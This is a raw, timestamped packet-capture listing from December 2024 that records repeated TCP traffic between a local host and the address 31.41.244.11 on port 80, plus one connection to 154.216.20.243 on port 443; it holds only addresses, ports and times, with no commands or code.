                                                                                                                                                                                              Dec 16, 2024 01:01:44.281718969 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.281846046 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.281902075 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.282809973 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.282854080 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.282980919 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.283025026 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.284044027 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.284089088 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.284203053 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.284248114 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.285281897 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.285326004 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.285434961 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.285479069 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.286432028 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.286478043 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.286612034 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.286654949 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.287730932 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.287750006 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.287780046 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.287811995 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.288950920 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.288968086 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.289001942 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.289002895 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.289941072 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.289985895 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.290102005 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.290147066 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.291049957 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.291069984 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.291095972 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.291126966 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.292356014 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.292402029 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.292530060 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.292576075 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.350389957 CET49859443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:44.431824923 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.431852102 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.431926966 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.431999922 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.432130098 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.432169914 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.432183981 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.432208061 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.433278084 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.433352947 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.433402061 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.433470964 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.434408903 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.434519053 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.441036940 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.441063881 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.441118002 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.441118002 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.441487074 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.441535950 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.441740036 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.441792965 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.441840887 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.441890001 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.442909956 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.442969084 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.442975998 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.443021059 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.444137096 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.444195032 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.444211006 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.444256067 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.445357084 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.445375919 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.445406914 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.445440054 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.446434975 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.446486950 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.446547031 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.446590900 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.447633028 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.447698116 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.447746038 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.447793007 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.448920965 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.448940039 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.448976040 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.448976040 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.450088024 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.450104952 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.450140953 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.450140953 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.451265097 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.451282978 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.451328039 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.451328039 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.452449083 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.452495098 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.452507973 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.452552080 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.453552008 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.453605890 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.453660965 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.453701973 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.454736948 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.454787016 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.454842091 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.454883099 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.455936909 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.455991030 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.456056118 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.456101894 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.457113028 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.457200050 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.457233906 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.457279921 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.458400965 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.458419085 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.458453894 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.458487988 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.459539890 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.459593058 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.459635973 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.459635973 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.460674047 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.460720062 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.460807085 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.460850000 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.461889029 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.461932898 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.461992025 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.462034941 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.463083029 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.463130951 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.463186026 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.463227034 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.464268923 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.464318037 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.464407921 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.464451075 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.465476990 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.465495110 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.465527058 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.465559006 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.466639042 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.466691017 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.466711044 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.466759920 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.467793941 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.467849016 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.467911959 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.467969894 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.468970060 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.469023943 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.469132900 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.469178915 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.470150948 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.470206976 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.470284939 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.470330954 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.471362114 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.471415043 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.471502066 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.471545935 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.472567081 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.472618103 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.472640991 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.472680092 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.473800898 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.473818064 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.473853111 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.473853111 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.474935055 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.474984884 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.475040913 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.475084066 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.476120949 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.476169109 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.476198912 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.476242065 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.477294922 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.477343082 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.477396965 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.477441072 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.478466034 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.478523016 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.478579998 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.478626966 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.479670048 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.479723930 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.479787111 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.479830980 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.480933905 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.480952024 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.480988026 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.481025934 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.482228041 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.482244968 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.482283115 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.482316017 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.483323097 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.483340025 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.483372927 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.483406067 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.484544039 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.484561920 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.484596014 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.484647989 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.485692978 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.485711098 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.485759974 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.485759974 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.486814022 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.486876965 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.486884117 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.486926079 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.487993002 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.488039970 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.488070011 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.488112926 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.489204884 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.489250898 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.489305019 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.489347935 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.490430117 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.490447044 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.490479946 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.490514040 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.491519928 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.491569996 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.491617918 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.491656065 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.492724895 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.492770910 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.493114948 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.493160009 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.493896008 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.493952036 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.494009018 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.494060040 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.495188951 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.495208025 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.495242119 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.495275021 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.496326923 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.496345997 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.496380091 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.496413946 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.497478962 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.497531891 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.497539043 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.497577906 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.498740911 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.498790026 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.498827934 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.498867035 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.623641014 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.623691082 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.623744965 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.623785019 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.624372959 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.624392033 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.624413967 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.624429941 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.625435114 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.625473976 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.625555038 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.625608921 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.626631975 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.626674891 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.633312941 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.633364916 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.633416891 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.633459091 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.633832932 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.633872986 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.633984089 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.634020090 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.635072947 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.635113955 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.635118961 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.635157108 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.636209011 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.636249065 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.636567116 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.636607885 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.636713982 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.636749029 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.637818098 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.637835979 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.637876987 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.637892962 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.638952971 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.638992071 CET4984880192.168.2.431.41.244.11
